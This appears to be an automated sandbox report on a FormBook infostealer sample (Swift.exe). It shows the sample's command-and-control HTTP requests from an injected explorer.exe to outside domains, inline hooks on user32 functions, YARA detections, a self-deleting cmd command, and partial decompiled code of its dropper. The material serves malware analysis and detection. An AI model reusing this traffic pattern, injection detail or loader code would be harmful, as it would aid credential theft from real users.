Nov 22, 2022 12:51:18.482681036 CET	100	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 22 Nov 2022 11:51:18 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49701	188.114.97.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2022 12:51:39.466130972 CET	101	OUT	GET /b31b/?lTkLp=QFC5kflo2W9xiWPHk6PVZq5LNtx9PE4uciQ0+TaWAe5dGm0MZgEm/6IYv+k7jhxT2GZX&s2MHE=y8UpS6w HTTP/1.1 Host: www.barmanon5.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2022 12:51:39.590523005 CET	103	IN	HTTP/1.1 404 Not Found Date: Tue, 22 Nov 2022 11:51:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Oct 2022 21:03:40 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ltgeLPpngNX%2BdhEjH4one8P0pJihrHIbCD2PqhmdnqEebNryhGjRb59n09MnI2R3gwRb4oEbLVM8i3XgAK1ucIh6gd8Q6uRsibB39EokN4QxiE0IqsN0mec5%2BXLY6km1BuK6DQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 76e17457abd09bdc-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 35 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f Data Ascii: 586<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bo
Nov 22, 2022 12:51:39.590572119 CET	103	IN	Data Raw: 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e Data Ascii: ld; letter-spacing: -1px; margin: -3px 0 39px;} p {width:320px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:320px; text-align:center; margin-left:auto;margin-right:auto;} a:link
Nov 22, 2022 12:51:39.590667009 CET	104	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49702	45.221.114.43	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2022 12:52:00.152930975 CET	104	OUT	GET /b31b/?lTkLp=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&s2MHE=y8UpS6w HTTP/1.1 Host: www.fulili.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2022 12:52:00.363827944 CET	106	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 22 Nov 2022 11:51:58 GMT Connection: close Content-Length: 1163 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3>
Nov 22, 2022 12:52:00.363867044 CET	106	IN	Data Raw: c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: </h3> </fieldset></div></div></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xEB
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xEB
GetMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xEB
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xEB

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Swift.exePID: 4836, Parent PID: 3528

General

Target ID:	0
Start time:	12:47:57
Start date:	22/11/2022
Path:	C:\Users\user\Desktop\Swift.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Swift.exe
Imagebase:	0x400000
File size:	226494 bytes
MD5 hash:	0202C53A04751949B148AC5EAB59030E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: idxgunu.exePID: 1980, Parent PID: 4836

General

Target ID:	1
Start time:	12:47:58
Start date:	22/11/2022
Path:	C:\Users\user\AppData\Local\Temp\idxgunu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx
Imagebase:	0x12c0000
File size:	7680 bytes
MD5 hash:	8748279BD1A60B520E0F062016B094E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 17%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5084, Parent PID: 1980

General

Target ID:	2
Start time:	12:47:58
Start date:	22/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: idxgunu.exePID: 4620, Parent PID: 1980

General

Target ID:	3
Start time:	12:47:59
Start date:	22/11/2022
Path:	C:\Users\user\AppData\Local\Temp\idxgunu.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\idxgunu.exe" C:\Users\user\AppData\Local\Temp\jdgedcev.bx
Imagebase:	0x12c0000
File size:	7680 bytes
MD5 hash:	8748279BD1A60B520E0F062016B094E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3528, Parent PID: 4620

General

Target ID:	4
Start time:	12:48:03
Start date:	22/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff618f60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 3216, Parent PID: 3528

General

Target ID:	5
Start time:	12:48:39
Start date:	22/11/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe
Imagebase:	0x1110000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1668, Parent PID: 3216

General

Target ID:	6
Start time:	12:48:44
Start date:	22/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\AppData\Local\Temp\idxgunu.exe"
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4852, Parent PID: 1668

General

Target ID:	7
Start time:	12:48:45
Start date:	22/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Swift.exePID: 4836, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	14.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.7%
Total number of Nodes:	1281
Total number of Limit Nodes:	24

Executed Functions

Function 004030F1 Relevance: 82.6, APIs: 26, Strings: 21, Instructions: 313
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			_entry_() {
				intOrPtr _t40;
				CHAR* _t44;
				char* _t47;
				signed int _t49;
				void* _t53;
				intOrPtr _t55;
				int _t56;
				signed int _t59;
				signed int _t60;
				int _t61;
				signed int _t63;
				signed int _t66;
				int _t83;
				void* _t87;
				void* _t99;
				intOrPtr* _t100;
				void* _t103;
				CHAR* _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t113;
				signed int _t115;
				char* _t117;
				signed int _t118;
				void* _t120;
				void* _t121;
				char _t138;

				 *(_t121 + 0x1c) = 0;
				 *((intOrPtr*)(_t121 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				_t110 = 0;
				 *(_t121 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t100 = E00405F11(0);
					if(_t100 != 0) {
						 *_t100(0xc00);
					}
				}
				E00405EA7("UXTHEME"); // executed
				E00405EA7("USERENV"); // executed
				E00405EA7("SETUPAPI"); // executed
				E00405F11(0xd);
				_t40 = E00405F11(0xb);
				 *0x7a2784 = _t40;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x7a2838 = _t40;
				SHGetFileInfoA(0x79dd48, 0, _t121 + 0x34, 0x160, 0); // executed
				E00405B85(0x7a1f80, "NSIS Error");
				_t44 = GetCommandLineA();
				_t117 = "\"C:\\Users\\jones\\Desktop\\Swift.exe\"";
				E00405B85(_t117, _t44);
				 *0x7a2780 = GetModuleHandleA(0);
				_t47 = _t117;
				if("\"C:\\Users\\jones\\Desktop\\Swift.exe\"" == 0x22) {
					 *((char*)(_t121 + 0x14)) = 0x22;
					_t47 =  &M007A8001;
				}
				_t49 = CharNextA(E004056A3(_t47,  *((intOrPtr*)(_t121 + 0x14))));
				 *(_t121 + 0x1c) = _t49;
				while(1) {
					_t103 =  *_t49;
					_t125 = _t103;
					if(_t103 == 0) {
						break;
					}
					__eflags = _t103 - 0x20;
					if(_t103 != 0x20) {
						L8:
						__eflags =  *_t49 - 0x22;
						 *((char*)(_t121 + 0x14)) = 0x20;
						if( *_t49 == 0x22) {
							_t49 = _t49 + 1;
							__eflags = _t49;
							 *((char*)(_t121 + 0x14)) = 0x22;
						}
						__eflags =  *_t49 - 0x2f;
						if( *_t49 != 0x2f) {
							L18:
							_t49 = E004056A3(_t49,  *((intOrPtr*)(_t121 + 0x14)));
							__eflags =  *_t49 - 0x22;
							if(__eflags == 0) {
								_t49 = _t49 + 1;
								__eflags = _t49;
							}
							continue;
						} else {
							_t49 = _t49 + 1;
							__eflags =  *_t49 - 0x53;
							if( *_t49 == 0x53) {
								__eflags = ( *(_t49 + 1) | 0x00000020) - 0x20;
								if(( *(_t49 + 1) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000002;
									__eflags = _t110;
								}
							}
							__eflags =  *_t49 - 0x4352434e;
							if( *_t49 == 0x4352434e) {
								__eflags = ( *(_t49 + 4) | 0x00000020) - 0x20;
								if(( *(_t49 + 4) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000004;
									__eflags = _t110;
								}
							}
